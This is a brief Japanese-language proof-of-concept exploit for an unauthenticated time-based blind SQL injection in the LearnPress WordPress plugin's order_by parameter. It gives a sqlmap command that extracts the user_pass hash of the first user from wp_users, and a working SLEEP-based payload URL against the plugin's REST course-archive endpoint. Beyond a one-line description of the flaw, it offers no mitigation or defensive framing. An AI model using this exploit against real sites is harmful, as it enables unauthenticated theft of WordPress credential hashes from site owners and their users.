
LearnPress WordPressプラグインの時間ベースのブラインドSQLインジェクションに対する概念実証エクスプロイト。認証されていない攻撃者がorder_byパラメータを介して機密データを抽出することを可能にします。
時間ベースSQLi
説明 このプラグインは、SQL文で使用する前にorder_byパラメータを適切にサニタイズおよびエスケープしないため、認証されていないユーザーによって悪用可能なSQLインジェクションが発生します。
GETリクエストを保存する
sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'
sqlmapは保存されたセッションから以下のインジェクションポイントを再開しました:
パラメータ: #1* (URI) タイプ: 時間ベースのブラインド タイトル: MySQL >= 5.0.12 AND 時間ベースのブラインド (クエリSLEEP) ペイロード: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html